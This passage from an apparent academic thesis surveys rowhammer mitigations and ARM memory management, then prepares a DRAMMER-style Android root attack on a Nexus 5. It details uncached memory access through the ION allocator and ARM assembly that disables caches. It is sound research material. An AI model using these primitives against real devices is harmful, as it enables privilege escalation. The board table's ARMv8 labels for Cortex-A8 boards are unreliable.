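The hard part in real hardware is not this logic but the storage: one counter per row across a whole module is a significant overhead, which is why mechanisms such as ARMOR (below) focus on tracking only the hottest rows.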


 PARA (Probabilistic Adjacent Row Activation)
The PARA mechanism probabilistically activates rows adjacent to a potential victim and relies on the detection of activation patterns, which needs support from the DRAM chip or the memory controller. As an enhancement of PARA, the Probabilistic Row Activation (PRA) mechanism has been presented in [35]. It simply allows the Memory Controller to probabilistically open adjacent and non-adjacent rows, expecting to refresh vulnerable rows before a bit flip occurs. This mechanism could mitigate rowhammer attacks with a smaller performance penalty, but it has not been further verified so far.
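PARA's stateless policy can be sketched in a few lines: on every row activation, a neighbour is additionally refreshed with small probability p, so no per-row counters are needed at all. The probability value and the use of rand() are illustrative; a real controller would draw from a hardware entropy source.

```c
#include <assert.h>
#include <stdlib.h>

/* Sketch of PARA's decision: with probability p, this activation also
 * refreshes an adjacent row. Stateless, so storage cost is zero; the
 * trade-off is that protection is only probabilistic. */
int para_should_refresh(double p)
{
    return ((double)rand() / (double)RAND_MAX) < p;
}
```

With a hammering threshold of tens of thousands of activations per refresh window, even a small p makes the chance that an aggressor row is never caught vanishingly small.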

 ARMOR
The main challenge in mitigating the rowhammer effect with a hardware-based countermeasure is monitoring the number of activations of each row in the DRAM, which imposes a significant storage overhead on the memory system. ARMOR [84] is a run-time memory hot-row detector that monitors row activations at the memory-interface level. It detects the rows at risk at run-time with minimal storage overhead. It also introduces a cache-buffer solution for rows detected to have frequent activations: the frequently activated rows are served from outside the DRAM module, preventing them from being hammered.

5.3 SOFTWARE-BASED MITIGATIONS
Software-based mitigations try to prevent the attack by blocking any of the attack primitives described in the previous sections (4). By blocking a primitive, the attack no longer works because it cannot achieve the intended effect. The software-based defences fall into different classes depending on the assumptions and properties of each form of protection. The categorization is similar to the one proposed in [43].

 Static Analysis
Static code analysis is a fully automated way to detect rowhammer code. A tool in this direction is proposed in [85]. It is used to detect microarchitectural attacks by testing binary code before loading it into an app store. If the detection works, the user cannot be attacked anymore. Software-based performance counters have also been used to analyse specific behaviour common in side-channel attacks, such as the use of high-resolution timers or cache-flush instructions [86]. This countermeasure can be used to detect rowhammer when it is based on finding cache eviction sets (4.2.2), by detecting the use of high-resolution timers, which are necessary in the cache side channel to find the set of addresses that fall into the same cache way. On the other hand, it can be used to detect clflush-based (4.2.1) rowhammer attacks by detecting overuse of the CLFLUSH cache instruction.

 Monitoring
If performance counters are available, typical parameters for rowhammer detection, such as the numbers of cache hits and cache misses, can be used to detect the attack and stop it before it becomes exploitable. Some of the countermeasures used to detect cache side-channel attacks rely on monitoring the number of cache hits and misses [87]. They could be used to detect rowhammer attacks too, when cache eviction sets (4.2.2) are used for evicting the aggressor rows. Also, the


FLUSH+RELOAD loop of rowhammer can be detected by cache-attack defences such as [88] that rely on hardware performance counters. ANVIL is a software-based countermeasure that uses CPU performance counters to monitor the number of last-level cache misses and marks the addresses if the number exceeds a predetermined threshold. When the threshold is exceeded, the nearby memory rows are refreshed, mitigating the rowhammer effect. It uses Intel PEBS to monitor the addresses of cache misses in order to distinguish rowhammer attacks from legitimate workloads. Since the row refresh imposes a performance penalty, ANVIL improves its performance by counting only accesses to two rows in the same bank. This approach leaves one-sided hammering out of the detection, allowing attacks such as Another Flip in the Wall [43] and Nethammer [62]. The monitoring of access patterns relies on the fact that triggering rowhammer produces a large number of cache misses on one row and accumulated accesses on other rows in the same DRAM bank. This approach is used in [89] to detect rowhammer and stop it before the bits flip. A newer countermeasure proposed in [90] detects the injected bit flips instead of predicting them from the beginning. It monitors DRAM-bank memory accesses at runtime, and the potentially vulnerable rows, i.e. the rows adjacent to the accessed ones, are inserted into a dynamic tree. A sliding-window protocol monitors the access frequency to the same DRAM bank over a short interval, achieving a reduction in the number of rows that need to be maintained in the tree. Their experiments confirmed that the framework enables rapid detection of the bit flips caused by rowhammer attacks.
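The sliding-window idea of [90] can be sketched as follows. The window length, the threshold and the abstract time unit are illustrative assumptions for the sketch, not values from the paper.

```c
#include <assert.h>
#include <stdint.h>

/* Sketch of sliding-window monitoring for one DRAM bank: keep the
 * timestamps of recent activations and flag when the count inside
 * the window exceeds a threshold. Entries older than the window are
 * discarded, which bounds the state that must be maintained. */
#define WIN    100   /* window length, in abstract time units */
#define THRESH 4     /* suspicious activation count per window  */
#define MAXLOG 64

static uint64_t log_ts[MAXLOG];
static int log_n;

/* Record an access to the bank at time t; return 1 if the access
 * frequency inside the current window looks like hammering. */
int record_access(uint64_t t)
{
    int keep = 0;
    for (int i = 0; i < log_n; i++)       /* drop expired entries */
        if (log_ts[i] + WIN > t)
            log_ts[keep++] = log_ts[i];
    log_n = keep;
    if (log_n < MAXLOG)
        log_ts[log_n++] = t;
    return log_n >= THRESH;
}
```

Because stale timestamps fall out of the window, a legitimate workload that touches the bank occasionally never trips the threshold, while a tight hammering loop does so almost immediately.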

 Preventing Physical Proximity
Many rowhammer attacks need to flip bits in kernel pages in order to take over the system. If the attacker cannot flip bits across security domains, the flips are meaningless in terms of impact. A possible defence is to partition physical memory into different domains and make sure that injected bit flips can only affect the attacker's own memory region. G-CATT [91] extends the memory allocator to physically isolate the kernel and userspace by leaving a gap in physical memory. This solution severely limits the ability of most system kernels to move physical memory between zones, a capability that alleviates memory pressure by making all possible resources available to an app or to the kernel itself. In addition, app-to-app attacks are outside the protection scope, because guaranteeing more than one domain greatly increases the complexity of the memory controller. A recent attack, Another Flip in the Wall [43], has managed to bypass G-CATT [91] by exploiting a bit flip in the opcodes of the shared sudo binary in userspace. Also, double-ownership kernel buffers, like video buffers, allow Still Hammerable [63] to effectively defeat CATT and gain both root and kernel privileges. The Google mitigations against DRAMMER [2] enforce that the system heap returns only memory pages from highmem, and not from lowmem, which contains the critical data structures. In practice, the attacker can allocate many ION chunks to deplete the highmem pool and force allocations to be served from lowmem, as done in the RAMpage attack [60]. The highmem/lowmem separation also suffers from the same issues described before.


The GuardION defence [60] is a countermeasure against DMA-based rowhammer exploits on mobile devices. It focuses on limiting the attacker's capability to affect memory outside the DMA region by isolating that region with two guard rows, one at the top and another at the bottom of the DMA buffer. This enforces that bit flips triggered through uncached memory cannot occur outside the DMA buffer boundary. Applying this countermeasure can prevent both the DRAMMER [2] and RAMpage [60] attacks. The countermeasure presented in [59] against their own Throwhammer attack is a memory-allocator feature called ALIS. It aims to ensure that all accessible rows in an isolated buffer are separated from the rest of system memory by at least one guard row that absorbs the bit flips. The latest countermeasure has been presented in ZebRAM [92], which protects sensitive data from malicious exploits by isolating all data rows with guard rows that absorb bit flips.
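The guard-row layout used by GuardION and ALIS can be sketched as a wrapper around a plain allocator. This is a hypothetical simplification: malloc does not really return physically contiguous DRAM rows, so the sketch only illustrates the address layout of the defence, not a working implementation.

```c
#include <stdint.h>
#include <stdlib.h>

/* Illustrative row size; real row sizes depend on the DRAM geometry. */
#define ROW_BYTES 4096

/* Allocate n_rows of usable memory padded with one guard row on each
 * side, so that flips hammered from inside the buffer land in the
 * guard rows. Returns a pointer past the leading guard row. */
uint8_t *guarded_alloc(size_t n_rows)
{
    uint8_t *raw = malloc((n_rows + 2) * ROW_BYTES);
    return raw ? raw + ROW_BYTES : NULL;
}

/* Release a buffer obtained from guarded_alloc(). */
void guarded_free(uint8_t *buf)
{
    if (buf)
        free(buf - ROW_BYTES);
}
```

The cost of the scheme is exactly two rows of wasted DRAM per isolated buffer, which is why GuardION applies it only to the DMA region rather than to all allocations.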

 Memory Footprint
Most rowhammer attacks need to profile a large amount of memory to find exploitable bit flips, and to almost exhaust the entire memory to place a page at a specific physical location. By default, the memory allocator avoids placing kernel pages close to user pages and only does so in near out-of-memory situations. If the memory allocator restrains exhaustive memory usage and the OS kills the malicious process that consumes the entire memory, an attacker can no longer force target pages into specific memory locations. Applying this countermeasure could prevent attacks such as Rowhammer.js [3], DRAMMER [2], GoogleProject0 [45], Glitch [57] [58], Throwhammer [59], and RAMpage [60].

 Prevent the use of vulnerable locations
B-CATT effectively removes the ability to induce bit flips by forbidding the system to use the vulnerable pages of the DRAM. The bootloader runs a rowhammer test over the entire physical memory to identify vulnerable pages and marks them as unavailable, forcing the system never to use them. It is not a very practical solution, because on a very vulnerable module a large amount of memory must be disabled, affecting the performance of the system. Also, memory fragmentation makes it harder for apps that require contiguous memory to work correctly. In addition, the number of vulnerable locations increases over time [60], so disabling rows at boot time is not enough to avoid future vulnerabilities.


6 INVESTIGATION OF ROWHAMMER AT EMBEDDED SYSTEMS

6.1 ARM ARCHITECTURE
The most widespread microarchitecture used in smartphones, tablets, and other embedded systems is based on the ARM family of instruction sets. It is a RISC (Reduced Instruction Set Computing) architecture configured with the aim of improving cost, power consumption and heat dissipation, which are desirable characteristics for light, portable, battery-powered devices. ARM Holdings develops the architecture and licenses it to other companies; each company designs its own implementation of the architecture for its products. Most companies do not provide documentation for their specific ARM implementation, which makes the implementation of microarchitectural attacks more difficult. Also, ARM does not provide instructions for fingerprinting DRAM modules [2]. We base our attacks on the ARM Architecture Reference Manual provided by ARM and the information available in the source code of the specific kernel. ARM provides three different architecture profiles. The ARM-A profile is intended for application use and is provided in ARMv7 (32-bit) or ARMv8 (64-bit) versions; its main distinguishing features are the use of an MMU (Memory Management Unit), required by most operating systems, and paging technology. The ARM-R profile is an optimized version for hard real-time and safety-critical applications; it is similar to ARM-A but includes features such as an MPU (Memory Protection Unit), non-overlapping memory regions and segmentation technology. The ARM-M profile is designed for use in microcontrollers, FPGAs and SoCs. In this study, we focus on the ARM-A architecture because it is the one most often used in mobile phones and tablets as well as in the Raspberry Pi. Specifically, we study the ARMv7-A version because its rowhammer vulnerability has been extensively proved in previous research [2]. A good memory management system is necessary, especially in embedded systems.
Memory resources are limited, requiring better allocating and deallocating mechanisms. The ARM MMU (Memory Management Unit) controls address translations and access permissions using a set of address translations and associated memory properties held in memory-mapped tables (translation tables). The translation tables use a short-descriptor translation table format that supports a memory map based on sections or pages: supersections consisting of 16MB of memory, sections of 1MB blocks of memory, large pages of 64kB, and small pages of 4kB. Sections and supersections map large regions of memory using only a single-level scheme, whereas pages use a two-level mapping scheme whose page-table structure is held in memory [93]. Figure 34 presents a general view of the various kinds of memory maps supported by the ARMv7-A architecture. Looking up an address via the in-memory page table is a one-step direct mapping for sections and a two-step process if the entry refers to a page. With sections, the physical base address is stored in the page-table entry of the first-level table. With pages, the page-table entry contains the address of the second-level table.


Figure 34 Address translations using Short-description format translation table. Figure in [93]

The ARM architecture provides different processor modes with different privilege levels for each security state (Secure and Non-secure). At PL0, software executes in User mode, sometimes described as unprivileged execution. The PLn mode is associated with privilege level n. In the typical PL1&0 configuration, running kernel and user space respectively, the translations of the MMU can be split between two sets of translation tables. Each set is defined by the TTBR0 and TTBR1 registers, which hold the base addresses of the two sets of tables, supporting the use of two simultaneous page-table trees at the hardware level. A third register, the TTBCR (Translation Table Base Control Register), sets a split point in the address space. Addresses below the split point are mapped through the page tables pointed to by TTBR0, and addresses above it are mapped through TTBR1. That division matches the memory split between user processes and the kernel. Hence, the value of TTBR1 should never change, because the kernel must remain permanently mapped. On the other hand, TTBR0 is modified at every process switch; it points to the page table of the current process. The typical virtual-address division between the TTBR0 and TTBR1 regions for ARMv7 is shown in Figure 35.

Figure 35 Boundaries between TTBR0 and TTBR1 in a common ARMv7 configuration

The first-level table entries for the section, supersection, and page-table schemes describe the mapping of the associated 1MB of virtual address space. Figure 36 shows the possible first-level descriptor formats associated with each kind of supported memory map. The page-table base-address descriptor gives the address of the second-level translation table, which specifies the mapping of the associated 1MB VA range, for the most common 4kB page-map scheme.

Figure 36 First-level descriptor formats

Figure 37 shows the possible formats of a second-level descriptor. The small-page base address provides the upper 20 bits of the physical memory address accessed.

Figure 37 Second-level descriptor formats


The four different map configuration types need four possible virtual-to-physical address translations. That the architecture supports mapping blocks of several sizes does not mean that the operating system uses this capability. Generally, on ARMv7-based devices the OS uses a two-level small-page hierarchy: 4kB page-size blocks are mapped, and an entry in the first-level table contains a pointer to second-level tables. In ARMv7 32-bit architectures, the top 12 bits of the 32-bit virtual address contain the offset into the first-level table. The next 8 bits contain the offset into the partial page table (256 entries per partial table). The partial page table contains a 20-bit physical page address. The lowest 12 bits of the virtual address complete the physical address by offsetting into the 4096-byte physical page (Figure 38).

Figure 38 ARMv7 32-bits virtual address description
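The address split described above can be expressed directly as bit manipulation. This is a small sketch of the index extraction only; the permission and type bits of the descriptors are omitted for clarity.

```c
#include <assert.h>
#include <stdint.h>

/* Decomposition of an ARMv7 32-bit virtual address under the common
 * 4 KB small-page, two-level scheme:
 *   [31:20] first-level index  (4096 entries)
 *   [19:12] second-level index (256 entries)
 *   [11:0]  byte offset within the 4 KB page */

uint32_t l1_index(uint32_t va)    { return va >> 20; }
uint32_t l2_index(uint32_t va)    { return (va >> 12) & 0xFF; }
uint32_t page_offset(uint32_t va) { return va & 0xFFF; }

/* Combine the 20-bit small-page base address taken from the
 * second-level descriptor with the page offset. */
uint32_t phys_addr(uint32_t page_base, uint32_t va)
{
    return (page_base & 0xFFFFF000u) | page_offset(va);
}
```

For example, the virtual address 0x80123ABC selects first-level entry 0x801, second-level entry 0x23, and byte 0xABC inside the resolved physical page.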

Thus, the hardware two-level page-table structure for 4kB mapped blocks has 4096 entries at the first level and 256 entries at the second level. Each entry is one 32-bit word, so each second-level page table is 1KB in size [93]. Most bits in the second-level entry are used by hardware, and there are no accessed and dirty bits to keep track of the accessed cache lines and the modified ones respectively. On the other hand, the Linux OS has a four-level page-table structure (pgd, pud, pmd and pte) (2.7). Thus, a mapping from the Linux page tables to the ARM hardware tables must be made to fit the two-level page-table structure (pgd, pte). The method used depends on the kernel version and is described in the kernel source file arch/arm/include/asm/pgtable.h [94].

6.2 STUDY OF ROWHAMMER AT SINGLE-BOARD COMPUTERS
Single-Board Computers (SBCs) integrate all the necessary computer features, such as memory, microprocessor and input/output, on a single board. They are mostly used in embedded applications and in process control, like complex robotics and processor-intensive applications. They have also been considered an excellent alternative to microcontrollers. An SBC is completely self-contained and its architectural design is different from that of standard desktops. They are available with a wide range of microprocessors, most of them based on the ARM architecture. In this section, we study the characteristics of two of the most common SBCs on the market, the Raspberry Pi [95] and the BeagleBone [96], with the aim of understanding whether they could be vulnerable to the rowhammer issue. Both Raspberry Pi and BeagleBone are based on ARM-architecture processors, and each one is available in various board versions with different processors, features and characteristics. The characteristics of the most recent versions of each are summarized in Table 12 and Table 13 respectively.


                       Raspberry Pi2 B     Raspberry Pi3 B     Raspberry Pi3 B+
Instruction Set        ARMv7-A             ARMv8-A             ARMv8-A
Word Width             32 bits             32/64 bits          32/64 bits
SoC                    Broadcom BCM2836    Broadcom BCM2837    Broadcom BCM2837B0
CPU                    4x Cortex-A7        4x Cortex-A53       4x Cortex-A53
CPU frequency          900 MHz             1.2 GHz             1.4 GHz
Memory (SDRAM)         LPDDR2 (1GB)        LPDDR2 (1GB)        LPDDR2 (1GB)
RI (refresh interval)  32ms                32ms                32ms

Table 12 Most recent Raspberry Pi model specifications

                       BeagleBone Black      BeagleBoard-X15                PocketBeagle
Instruction Set        ARMv8-A               ARMv7-A                        ARMv8-A
Word Width             32/64 bits            32 bits                        32/64 bits
SoC                    AM3358/9              Sitara AM5728                  OSD3358-SM
CPU                    Cortex-A8 +           Dual Cortex-A15 +              AM3358
                       Dual PRU              Dual ARM M4 (212 MHz) +        ARM Cortex-A8
                                             Quad PRU (200 MHz)
CPU frequency          1 GHz                 1.5 GHz                        1.0 GHz
Memory (SDRAM)         DDR3 (512 MiB)        DDR3L (2048 MiB)               DDR3 (512 MiB)
RI (refresh interval)  64ms                  64ms                           64ms

Table 13 Most recent BeagleBone model specifications

We must identify whether the RAM technology used in the device under study is vulnerable to rowhammer, considering existing research. Almost all DDR3 memories have been proved vulnerable to disturbance errors (3.2), which makes the BBB platforms perfect candidates for the rowhammer vulnerability. In contrast, the Raspberry Pi devices contain LPDDR2 memory, which is less vulnerable to disturbance due to its lower cell density (3.2). Nevertheless, bit flips on the Nexus 4 (LPDDR2 RAM) have been reported in the DRAMMER study [2], which leaves the door open to the vulnerability in systems with this type of RAM. Each DRAM technology provides a specific retention time for the cells of the chip, and each DRAM module specifies the RI (Refresh Interval) for the rows needed to guarantee correct data in the cells. As investigated in previous sections of this work (3.1), lower RI values typically result in a smaller number of bit flips. The Raspberry Pi DRAM modules require an RI of 32ms, which entails faster toggling to reach the Nth (threshold number of activations) and may limit the ability to trigger the vulnerability. On the other hand, this specific DRAM module needs a lower RI value to guarantee data retention because its cells discharge faster, which may imply a lower Nth to trigger the vulnerability. To trigger rowhammer it is not enough to use a vulnerable DRAM; success also depends on the specific system characteristics of the device under attack. The most crucial characteristic to consider is the CPU frequency. The principal requirement for a successful rowhammer is being able to activate rows fast enough to trigger the disturbance bug. This challenge is directly related to the CPU performance and the memory controller of each system [45]. The limited CPU performance of mobile devices was considered an obstacle to triggering the vulnerability until the DRAMMER study [2] proved that the double-sided rowhammer technique could be used to

overcome this limitation. The limited CPU performance of single-board computers is therefore not enough to rule out the chance of triggering the rowhammer vulnerability on them. The main challenge in triggering rowhammer on a vulnerable DRAM, given sufficient CPU performance, is to bypass the CPU caches so that every access is served from physical memory. Aiming to check the rowhammer vulnerability on the Raspberry Pi, we implemented a kernel module that triggers double-side rowhammer by flushing the cache between memory accesses.

GCC on Linux provides a clear-cache builtin, __clear_cache, to clean and invalidate a specific address range at every level of the cache memory hierarchy. The underlying implementation differs for each Linux kernel; the source code of the Raspbian kernel is available at [97]. The arch/arm/mm/cache-v7.S file references an issue regarding the clean-and-invalidate data cache process, and proposes simply invalidating the cache directly as a solution. This comment agrees with the results we observed in our kernel module implementation: we were not able to successfully clear the cache in order to implement the rowhammer test. The ARM architecture supports a space of sixteen coprocessors to extend the ARM processor functionality. The CP15 coprocessor is reserved by ARM for a specific purpose: it provides system control functionality, including architecture and feature identification as well as control, status and configuration support. The ARMv7 manual describes how the CP15 registers can be used to disable the different cache types. The SCTLR (System Control Register) section of CP15 provides top-level control of the system, including its memory system, as shown in Figure 39. In ARMv7 the SCTLR.C bit enables or disables all data and unified caches across all levels of cache visible to the processor, and the SCTLR.I bit enables or disables all instruction caches across all levels of cache visible to the processor (Figure 40).
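As a minimal illustration of the builtin mentioned above, a flush between accesses could look like the sketch below. This is our own example, not the thesis code: note that GCC documents __builtin___clear_cache primarily for instruction-cache coherence after writing code; on ARM Linux it invokes the cacheflush system call (clean D-cache, invalidate I-cache over the range), while on x86 it compiles to essentially nothing, which is consistent with the difficulties reported in the text.

```c
#include <stdint.h>
#include <stddef.h>

/* Read one byte from p after asking the toolchain to clean/invalidate
 * the containing range. On ARM this emits a cacheflush syscall for the
 * range; whether it suffices to force a DRAM access for rowhammer
 * depends on the kernel, as discussed in the text. */
static uint8_t read_after_flush(volatile uint8_t *p, size_t len)
{
    __builtin___clear_cache((char *)p, (char *)(p + len));
    return *p;
}
```

The data value must of course survive the flush; only the cached copy is affected, which the text relies on when hammering the same addresses repeatedly.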

Figure 39 CP15 c1 System Control Register in VMSA implementation. Figure in [93]

Figure 40 Format of SCTLR register in ARMv7-A implementation. Figure in [93]


Thus, the data cache can hypothetically be disabled by setting the SCTLR.C bit to 0, and the instruction cache by setting the SCTLR.I bit to 0. To perform this operation, we read the CP15 SCTLR control register, clear the C and I bits, and write the result back to CP15 SCTLR:

    MRC p15, 0, r1, c1, c0, 0    @ Read SCTLR into r1
    BIC r1, r1, #(0x1 << 12)     @ Clear SCTLR.I: disable instruction cache
    BIC r1, r1, #(0x1 << 2)      @ Clear SCTLR.C: disable data cache
    MCR p15, 0, r1, c1, c0, 0    @ Write r1 back to SCTLR

Our second attempt is based on the previous description: we aim to disable the cache to guarantee direct DRAM access. We added to the kernel source our own system call that disables the cache by clearing the corresponding bits of the SCTLR register, and then cross-compiled the kernel including the new feature, which can easily be called from a module. The Linux call that should hypothetically disable the cache in practice resulted in a kernel panic. The issue could be related to the fact that SCTLR is accessible only in privileged modes and that some of its bits correspond to non-configurable features provided just for compatibility with previous versions of the architecture. In addition, the defined reset value applies only to the Secure copy of the SCTLR when the Security Extensions are implemented; in this case the system call sets the non-banked read/write bits of the Non-secure copy of the register instead of the SCTLR itself. In conclusion, we can remark that the specific Linux kernel used in the Raspbian OS does not support every ARM feature, which limits our theoretical approaches. The rowhammer vulnerability of the BeagleBone (BB) can be assessed in a different way. The Debian distribution for BB is compatible with the CMEM API library, which manages blocks of contiguous physical memory. CMEM is a component of Linux Utils and can be configured by installing the provided kernel module (the cmem.ko driver) developed by Texas Instruments [98] for OMAP3 DSP architectures, such as the one included in the BeagleBone board.
After installing the driver with the insmod command, we are able to reserve a physically contiguous memory pool. A program running a rowhammer test could then be implemented by accessing that memory pool. Note that this approach cannot be used on the Raspberry Pi due to the incompatibility of the specific Linux tool with the platform.

6.3 DRAMMER: DETERMINISTIC ROWHAMMER ATTACK ON MOBILE PLATFORMS
DRAMMER is an attack on Android mobile platforms that exploits the rowhammer hardware vulnerability in a deterministic fashion. It is an instance of the Flip Feng Shui (FFS) [42] technique that relies only on always-on commodity features and is called Phys Feng Shui [2]. The central idea is to exploit the hardware vulnerability to flip bits while deterministically controlling the layout of physical memory, so as to place security-sensitive data in a vulnerable physical memory location. Both techniques have been published by VUSec (Systems and Network Security Group) at Vrije Universiteit Amsterdam as part of their rowhammer studies in the hardware vulnerability field [99]. In 2016 the VUSec group [99] published on GitHub [100] an open-source component for testing an Android device's vulnerability to the rowhammer bug, together with an Android app on the Google Play Store. The rowhammer vulnerability has been empirically proved on many ARMv7 32-bit devices and some ARMv8 64-bit devices using the referenced DRAMMER implementation [2]. They

also illustrate an end-to-end Android root attack and explain the Phys Feng Shui massaging technique. It is relevant to note that their attack implementation code has not been published. Google reacted to this vulnerability by deploying specific countermeasures in new Android kernel versions (5.1). The countermeasures prevent the exploitation of DRAMMER on Android from version 6 onward but leave older Android versions vulnerable. In addition, VUSec has recently published RAMpage [60], an improvement of their DRAMMER [2] attack that bypasses the current Google countermeasures. Our study of rowhammer attacks on mobile platforms aims to implement our own rowhammer Android root attack based on the Flip Feng Shui technique. Firstly, we analyse the ARM mobile architecture under attack, emphasising the system details that are most relevant to the attack implementation. Secondly, we present the specific software and hardware characteristics of the mobile device under attack. Finally, we describe the phases of our rowhammer attack implementation for Android 4.4.4 on the LG Nexus 5.

6.3.1 Mobile Platforms Characteristics
The specific characteristics of mobile devices render the attack primitives used on x86 architectures useless. The hardware is mostly an ARM processor with a slower memory controller, and the OS is in many cases Android, a more limited OS that implements just a subset of the features of desktop and server environments. A sufficient hammering frequency is achieved using the double-side rowhammer technique (3.2.1.2), and the limited feature set is overcome using the DMA buffer management APIs provided by the OS on Android/ARM. The ARM family cores commonly used in smartphones and tablets belong to the ARM A-profile. Our device under attack has an ARMv7-A architecture, because this architecture has been proved to be highly vulnerable to rowhammer in the DRAMMER paper [2]. Android is a Linux-based mobile OS developed by Google and designed primarily for touchscreen mobile devices such as tablets and smartphones. The Android kernel is a modified version of the Linux kernel LTS (Long Term Support) branches and depends on the individual device. Android's variant of the Linux kernel has further architectural changes outside the typical Linux kernel, such as the ashmem subsystem, the pmem allocator, the OOM (Out Of Memory) handler and the ION components. ashmem is a shared memory allocator that better supports low-memory devices because it can discard shared memory units under memory pressure. The pmem process memory allocator uses physically contiguous memory shared between processes. The OOM handler simply kills processes as available memory becomes low. Finally, ION is a general memory manager introduced in Android 4.0 as a memory pool manager. The characteristics of the ARMv7 architecture and the Android kernel that are most important for implementing the rowhammer attack are described in this section.

 Memory Allocation The ARM CPU can address a maximum of 4 GB of virtual address space, which must be shared between the kernel, user-space processes, and hardware devices. The physical memory is divided by default into two zones: the Normal zone and the High zone.


Android, like any other Linux platform, manages physical memory via the buddy allocator (2.7). The Normal zone and the High zone are each managed by a separate instance of the buddy allocator algorithm [101].

 DMA Buffer Management API Modern mobile computing platforms need to support efficient memory sharing between their several hardware components as well as between devices and user-land services. Such a device includes a GPU, display controller, camera, encoders and sensors besides the CPU or System on Chip. Thus, the OS must provide allocators that support operations on physically contiguous memory pages, since most devices need this kind of DMA (Direct Memory Access) performance (2.8.1). In the ARMv7 architecture memory layout, DMA is often associated only with the Normal zone of memory. The most complex rowhammer attack primitives, uncached memory access to DRAM and physical addressing of contiguous physical rows, can be realised by exploiting the DMA facilities.

 Android ION memory allocator ION is the generalized memory manager that Google introduced in the Android 4.0 release to address the issue of fragmented memory management interfaces across different Android devices. It aims to replace and unify the several memory management interfaces exposed by each hardware manufacturer. ION can manage cached shares via dma-buf (2.8.1) and work as a dma_buf exporter, and it includes interfaces for both user space and kernel-space drivers. It is not just a memory pool manager that provides allocation; it also enables its clients to share buffers with various devices [102]. The DMA buffer management APIs allow userland apps to obtain uncached memory. ION presents its memory pools as ION heaps. A distinct set of ION heaps is provided on each Android device according to its memory requirements; these heaps allocate memory at different memory locations and behave differently. The default ION driver offers three heaps, but developers can choose to add more. The default ION heaps are:

ION_HEAP_TYPE_SYSTEM: memory allocated via vmalloc_user() pages.

ION_HEAP_TYPE_SYSTEM_CONTIG: physically contiguous memory allocated via kmalloc().

ION_HEAP_TYPE_CARVEOUT: a region of physically contiguous memory permanently removed from the buddy allocator and set aside at boot.

ION offers the /dev/ion interface for user-space programs to allocate and share buffers. Typically, userspace devices use ION to allocate large contiguous media buffers. A userspace C/C++ program must have been granted access to the interface before it can allocate memory. A call to open("/dev/ion", O_RDONLY) returns a file descriptor that represents the only ION client associated with the process.

To allocate a buffer, the client needs to fill in the following data structure; every field is an input parameter except handle, which is an output parameter.


    struct ion_allocation_data {
        size_t len;
        size_t align;
        unsigned int flags;
        struct ion_handle *handle;
    };

The first three fields specify the length, alignment, and flags as input parameters. The flags field is a bit mask that indicates one or more ION heaps to allocate from.

User-space clients interact with ION using the ioctl() system call interface. The following call allocates a buffer and returns an ion_handle to manage it:

    int ioctl(int ion_fd, ION_IOC_ALLOC, struct ion_allocation_data *allocation_data);

The ion_handle is not a CPU-accessible buffer pointer; it needs to be converted to a file descriptor if we want to share the buffer or map it into virtual memory:

    int ioctl(int client_fd, ION_IOC_SHARE, struct ion_fd_data *fd_data);

ION_IOC_SHARE generates the dma-buf and returns a file descriptor fd, referenced via the ion_fd_data structure. This descriptor can be used to share the buffer with other processes and to map it into virtual memory via mmap(). Alternatively, the more specific call ION_IOC_MAP may be more appropriate for mapping the buffer when no sharing is intended.

To free the buffer, one must first undo the effect of mmap() with a call to munmap(), then close the file descriptor obtained via ION_IOC_SHARE with a call to close(), and finally issue the specific system call ION_IOC_FREE:

    int ioctl(int client_fd, ION_IOC_FREE, struct ion_handle_data *handle_data);

The ion_handle_data holds the handle. The above system call decrements the reference counter by one; when it reaches zero, the ion_handle object is destroyed and the corresponding ION bookkeeping data structures are updated. Although ION was originally created for 32-bit ARM architectures, since 2014 it can be built and run on different platforms such as x86_64 and ARM64.

 OOM Killer in Linux Android's behaviour under low-memory conditions, which includes the Linux OOM (Out Of Memory) killer, is much more predictable than on other OSes. The kernel developers pushed to include a Low Memory Killer (LMK) in the kernel. The LMK handles the system's low-memory conditions before the OOM killer is invoked. It tracks the shrinkers that memory subsystems and drivers have registered for reclaiming memory from RAM. If the system is close to running out of memory, the LMK calls the registered shrinkers to release and regain cached memory. The attack implementation must be especially careful not to run out of memory during the massaging phase.


6.3.2 Device Under Attack
In this section, we analyse the specific ARMv7 device that is the subject of the attack implementation. It is essential to understand the hardware details and kernel version characteristics of the system under study in order to successfully exploit the bit flips triggered by rowhammer.

 Hardware Details The mobile device under study is the LG Nexus 5. Basic information about the system is provided by the proc file system, which acts as an interface to internal data structures in the kernel; it can be used to obtain information about the system and to change certain kernel parameters at runtime. The /proc/cpuinfo file provides the hardware SoC and the architecture instruction set for the LG Nexus 5; the most important hardware component details are summarized in Table 14.

| Characteristic | Nexus 5 device |
|---|---|
| SoC (processor model) | Qualcomm MSM8974 HAMMERHEAD |
| Architecture instruction set | ARMv7-based (rev 0) |
| Machine word width | 32 bits |
| Processor core(s) | Quad-core 2.3 GHz Krait 400 |
| Data structure matching data | Flattened Device Tree (FDT) configuration |
| Memory interface | 2 GB LPDDR3 |
| Embedded GPU | Adreno 330 |

Table 14 General characteristics of the LG Nexus 5 device

The Qualcomm MSM8974 is an ARM-based SoC for tablets and smartphones built at TSMC in a 28 nm HPM (High-Performance Mobile) process. The processor integrates four independent units (Qualcomm Krait 400) with a clock speed of up to 2.3 GHz. Note that Qualcomm's Krait architecture, which is compatible with the ARMv7 ISA, is included in some of Qualcomm's top-line chipsets. The Adreno 330 GPU works at up to 450 MHz, and the LPDDR3 is a low-power memory kind that belongs to the rowhammer-vulnerable DRAM types (3.2).

6.4 TRIGGERING THE ROWHAMMER
By repeatedly accessing (hammering) the same memory row (aggressor row), an attacker can cause enough disturbance in a neighbouring row (victim row) to cause a bit flip. This can be triggered in software by code with a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration. A memory access consists of different stages (2.5). In the ACTIVATE stage, a row is first activated to transfer its data to the bank's row buffer by toggling ON its associated wordline. Secondly, the specific column of the row is read or written (READ/WRITE stage) from or to the row buffer. Finally, the row is closed by precharging (PRECHARGE stage) the specific bank, writing the value back to the row and switching OFF the wordline. The disturbance error is produced in a DRAM row when a nearby wordline's voltage is toggled repeatedly, meaning that it is produced by the repeated ACTIVATE/PRECHARGE of rows and not by the column READ/WRITE stage. The code must therefore guarantee that each access corresponds to a new row activation in order to trigger rowhammer.


